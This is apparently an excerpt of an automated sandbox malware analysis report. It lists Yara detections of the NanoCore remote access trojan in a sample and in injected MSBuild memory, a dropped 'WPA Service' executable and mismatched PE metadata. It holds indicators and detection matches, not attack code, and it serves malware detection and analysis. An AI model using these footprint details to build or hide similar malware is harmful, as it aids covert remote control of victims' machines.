Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 15_2_06BB5FF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 15_2_06BB2D36
Source: C:\Users\user\AppData\Roaming\59407D34-C8C5-44DF-A766-BA8A11CB1CB0\WPA Service\wpasv.exe | Code function: 16_2_015B51F9
Source: C:\Users\user\AppData\Roaming\59407D34-C8C5-44DF-A766-BA8A11CB1CB0\WPA Service\wpasv.exe | Code function: 16_2_015B18C0
Source: C:\Users\user\AppData\Roaming\59407D34-C8C5-44DF-A766-BA8A11CB1CB0\WPA Service\wpasv.exe | Code function: 16_2_015B2370
Source: C:\Users\user\AppData\Roaming\59407D34-C8C5-44DF-A766-BA8A11CB1CB0\WPA Service\wpasv.exe | Code function: 18_2_04F651F9
Source: C:\Users\user\AppData\Roaming\59407D34-C8C5-44DF-A766-BA8A11CB1CB0\WPA Service\wpasv.exe | Code function: 18_2_04F62370
Source: C:\Users\user\AppData\Roaming\59407D34-C8C5-44DF-A766-BA8A11CB1CB0\WPA Service\wpasv.exe | Code function: 18_2_04F61A2F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 30_2_0320E471
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 30_2_0320E480
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 30_2_0320BBD4
PE file contains strange resources
Source: GgNhpv.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST (3 resources)
Source: wpasv.exe.15.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST (3 resources)
Sample file name differs from the original file name gathered from version info
Source: GgNhpv.exe, 00000000.00000002.817419204.0000000000CD0000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenamenlsbres.dll.muij% vs GgNhpv.exe
Source: GgNhpv.exe, 00000000.00000002.817194347.0000000000C50000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenamenlsbres.dllj% vs GgNhpv.exe
Source: GgNhpv.exe, 00000000.00000003.797888702.000000001B03D000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs GgNhpv.exe
Source: GgNhpv.exe, 00000000.00000002.814854545.00000000008B0000.00000004.00000020.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs GgNhpv.exe
Source: GgNhpv.exe, 00000000.00000000.756009340.0000000000348000.00000002.00020000.sdmp | Binary or memory string: OriginalFilename876544.exe4 vs GgNhpv.exe
Source: GgNhpv.exe, 00000000.00000002.824265843.000000001B110000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenamemscorrc.dllT vs GgNhpv.exe
Source: GgNhpv.exe, 00000000.00000002.819878835.0000000002802000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenametaskschd.dll.muij% vs GgNhpv.exe
Source: GgNhpv.exe, 00000000.00000002.819878835.0000000002802000.00000004.00000001.sdmp | Binary or memory string: ,\\StringFileInfo\\040904B0\\OriginalFilenamexh vs GgNhpv.exe
Source: GgNhpv.exe, 00000000.00000002.817094495.0000000000C00000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenameuser32j% vs GgNhpv.exe
Source: GgNhpv.exe, 00000000.00000002.819495770.000000000275A000.00000004.00000001.sdmp | Binary or memory string: OriginalFilename vs GgNhpv.exe
Source: GgNhpv.exe, 00000000.00000002.819495770.000000000275A000.00000004.00000001.sdmp | Binary or memory string: ,\\StringFileInfo\\000004B0\\OriginalFilenamexh vs GgNhpv.exe
Source: GgNhpv.exe | Binary or memory string: OriginalFilename876544.exe4 vs GgNhpv.exe
Yara signature match
Source: GgNhpv.exe, type: SAMPLE | Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: .text, type: SAMPLE | Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000000.00000003.812356189.000000001B070000.00000004.00000001.sdmp, type: MEMORY | Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 0000000F.00000002.1186978223.0000000005400000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000F.00000002.1186978223.0000000005400000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000000.00000003.811932086.000000001B0D5000.00000004.00000001.sdmp, type: MEMORY | Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 0000000F.00000002.1188156970.00000000061D0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000F.00000002.1188156970.00000000061D0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000F.00000002.1186893874.00000000053D0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000F.00000002.1186893874.00000000053D0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000000.00000002.813678995.00000000002D2000.00000002.00020000.sdmp, type: MEMORY | Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 0000000F.00000002.1186233370.00000000050B0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000F.00000002.1186233370.00000000050B0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000000.00000002.824559362.000000001B2B0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 0000000F.00000002.1186832328.00000000053B0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000F.00000002.1186832328.00000000053B0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000000.00000003.812525403.000000001B0AB000.00000004.00000001.sdmp, type: MEMORY | Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 0000000F.00000002.1182142774.0000000002BE4000.00000004.00000001.sdmp, type: MEMORY | Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000001E.00000002.1158787988.0000000004409000.00000004.00000001.sdmp, type: MEMORY | Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000000.00000002.824133782.000000001B078000.00000004.00000001.sdmp, type: MEMORY | Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 0000000F.00000002.1186856992.00000000053C0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000F.00000002.1186856992.00000000053C0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000000.00000003.812453823.000000001B2B0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 0000000F.00000002.1179468544.0000000000402000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000F.00000002.1179468544.0000000000402000.00000040.00000001.sdmp, type: MEMORY | Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000F.00000002.1183790232.0000000003C13000.00000004.00000001.sdmp, type: MEMORY | Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000F.00000002.1187390172.0000000005CC0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000F.00000002.1187390172.0000000005CC0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000001E.00000002.1156120893.0000000000402000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000001E.00000002.1156120893.0000000000402000.00000040.00000001.sdmp, type: MEMORY | Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000F.00000002.1186946814.00000000053F0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000F.00000002.1186946814.00000000053F0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000000.00000003.812561502.000000001B0CA000.00000004.00000001.sdmp, type: MEMORY | Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000000.00000002.823522467.000000001AFF0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 0000000F.00000002.1186346502.00000000051C0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000F.00000002.1186346502.00000000051C0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000F.00000002.1186719168.0000000005370000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000F.00000002.1186719168.0000000005370000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000F.00000002.1186313236.00000000051B0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000F.00000002.1186313236.00000000051B0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000000.00000003.812606471.000000001B078000.00000004.00000001.sdmp, type: MEMORY | Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 0000000F.00000002.1187296119.0000000005C90000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000F.00000002.1187296119.0000000005C90000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000F.00000002.1187421494.0000000005CD0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000F.00000002.1187421494.0000000005CD0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000000.00000003.812308519.000000001B07F000.00000004.00000001.sdmp, type: MEMORY | Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000000.00000000.755852415.00000000002D2000.00000002.00020000.sdmp, type: MEMORY | Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 0000000F.00000002.1187312590.0000000005CA0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000F.00000002.1187312590.0000000005CA0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000000.00000003.812975624.000000001B08E000.00000004.00000001.sdmp, type: MEMORY | Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 0000001E.00000002.1158420771.0000000003400000.00000004.00000001.sdmp, type: MEMORY | Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000F.00000002.1184242562.0000000003E31000.00000004.00000001.sdmp, type: MEMORY | Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: MSBuild.exe PID: 4220, type: MEMORY | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: MSBuild.exe PID: 4220, type: MEMORY | Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: MSBuild.exe PID: 2072, type: MEMORY | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: MSBuild.exe PID: 2072, type: MEMORY | Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 15.2.MSBuild.exe.5c90000.13.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 15.2.MSBuild.exe.5c90000.13.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 15.2.MSBuild.exe.53d0000.8.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 15.2.MSBuild.exe.53d0000.8.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 15.2.MSBuild.exe.50b0000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 15.2.MSBuild.exe.50b0000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 15.2.MSBuild.exe.53f0000.10.raw.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 15.2.MSBuild.exe.53f0000.10.raw.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 15.2.MSBuild.exe.53d0000.8.raw.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 15.2.MSBuild.exe.53d0000.8.raw.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 15.2.MSBuild.exe.5370000.5.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 15.2.MSBuild.exe.5370000.5.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 15.2.MSBuild.exe.53c0000.7.raw.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 15.2.MSBuild.exe.53c0000.7.raw.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 15.2.MSBuild.exe.5c90000.13.raw.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 15.2.MSBuild.exe.5c90000.13.raw.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
